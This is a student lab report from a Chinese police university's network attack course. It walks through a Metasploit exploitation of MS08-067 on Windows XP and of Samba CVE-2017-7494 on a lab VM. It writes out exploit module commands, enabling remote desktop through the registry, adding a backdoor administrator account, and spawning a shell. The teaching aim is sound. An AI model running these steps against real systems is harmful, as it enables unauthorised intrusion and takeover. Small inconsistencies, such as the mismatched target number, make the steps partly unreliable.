實驗五
中國人民公安大學
Chinese people’ public security university
網絡對抗技術
實驗報告
|
實驗五 |
|
學生姓名 |
陳雨龍 |
|
年級 |
2015 |
|
區隊 |
三 |
|
指導教師 |
高見 |
信息技術與網絡安全學院
2018年11月1日
實驗任務總綱
2018—2019 學年 第 1學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬件和軟件環境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統和啟動工具軟件環境。
2)用軟件工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
windows ms08067 漏洞利用
https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw 靶機環境
一.1 知識背景
Metasploit是一款開源的安全漏洞檢測工具,Metasploit Framework (MSF) 在2003年以開放源碼方式發布,是可以自由獲取的開發框架。它是一個強大的開源平臺,供開發,測試和使用惡意代碼,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平臺。這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平臺上常見的溢出漏洞和流行的 shellcode ,并且不斷更新。
Metasploit Framework并不止具有exploit(溢出)收集功能,它使你專注于創建自己的溢出模塊或者二次開發。很少的一部分用匯編和C語言實現,其余均由ruby實現??傮w架構:

一.2 實訓環境
Windows XP SP3

Kali Linux
一.3 實訓原理
漏洞名稱:Windows Server服務RPC請求緩沖區溢出漏洞(MS08-067)此安全更新解決了服務器服務中一個秘密報告的漏洞。如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網絡資源免受從企業外部發起的攻擊。

一.4 漏洞利用過程
在msfconsole使用search命令搜索MS08067漏洞攻擊程序

從結果中得到
exploit/windows/smb/ms08_067_netapi
表示當前msf框架中包含MS08067漏洞的攻擊插件。
使用use命令調用MS08067漏洞攻擊程序
use exploit/windows/smb/ms08_067_netapi

進入msf的交互式命令窗口下,使用show options 命令查看需要設置的選項。

從圖中可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)使用 set 命令設置 Module Options,此處需要設置目標IP即 set RHOST 172.16.211.129

使用 set 命令設置后,可再使用show options 命令查看設置情況。從中可以看出目標IP已經設置好接著設置Exploit target,使用show targets 查看可選項可以看出以下版本的系統均存在此漏洞。因為實例演示的XP系統為WinXP SP0沒有任何補丁的中文版對應的編號為2

使用set target 命令設置目標,此處即為set target 34

此時再用show options 可以看到全部設置完成,接著使用exploit 或者 run 進行攻擊

執行exploit命令后得到一個meterpreter命令行交互窗口
在meterpreter中輸入run getgui -e 命令,可以打開RDP(遠程桌面)服務,端口號3389。

繼續輸入shell即可進入CMD窗口

在cmd命令下也可以通過添加注冊表項的方式開啟對方遠程桌面服務(如果上面已經開啟了,這步可以省略)。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat -an命令查看端口是否開放,從圖中可以看到已經開放3389端口。

接著使用net user命令查看XP系統中的用戶

接著使用net user命令查看XP系統中的用戶

在平臺中獲取shell之后,繼續在命令行添加賬戶和管理員權限。
net user user pass /add 例如:net user gao 123 /add
net localgroup administrators /add

例如:net localgroup administrators gao /add
最后開啟遠程桌面,利用剛在添加的賬戶登陸被攻擊機器。
rdesktop -a 32 -u gao -p 123 172.16.211.129:3389

(二)SMB協議漏洞利用與控制CVE-2017-7494
一.1 漏洞描述
Samba是在Linux和UNIX系統上實現SMB協議的一個軟件。2017年5月24日Samba發布了4.6.4版本,修復了一個嚴重的遠程代碼執行漏洞,漏洞編號CVE-2017-7494,漏洞影響了Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中間的版本。攻擊者可以利用客戶端將指定庫文件上傳到具有可寫權限的共享目錄,使服務器加載并執行它。只需要一個可寫入的Samba用戶權限就可以利用該漏洞以root身份執行任意代碼。
https://pan.baidu.com/s/1AMd3BwbNjibv0TIcJjAFMw 靶機環境
一.2 實訓環境
v 靶機環境:Stapler.zip中包含虛擬機導入文件,請使用virtual-box加載啟動。環境中有CVE-2017-7494相應的漏洞。(網卡模式設置為NAT模式或Bridge【橋接】模式--和攻擊環境設置一樣的模式即可)
v 攻擊環境:Kali-linxu,使用virtual-box啟動。(網卡模式設置為NAT模式或Bridge【橋接】模式--和靶機環境設置一樣的模式即可)
v 實驗目的:讀取靶機環境中的/root/flags.txt文件
v 說明:靶機環境和攻擊環境為兩臺虛擬機,啟動并保證兩臺機器互聯互通。
一.3 實訓步驟
一、在攻擊者機器上,使用Nmap或netdiscover工具掃描子網的機器,發現靶機的IP地址。【實驗中,大家環境不同,發現的IP地址和圖中不一定一致】

二、使用Nmap工具掃描目標IP地址,發現其開放端口。


三、啟動MSF搜索CVE-2017-7494相關攻擊模塊
四、加載攻擊模塊

五、查看攻擊模塊中需要配置的參數

其中RHOST代表要攻擊的目標IP地址
RPORT代表攻擊目標的端口號
六、設置參數,并發動攻擊

七、獲取shell后,查看權限

八、獲得命令行交互窗口
使用python腳本獲得交互命令行窗口,腳本如下:
python -c "import pty; pty.spawn('/bin/bash')"

九、查看flag文件

浙公網安備 33010602011771號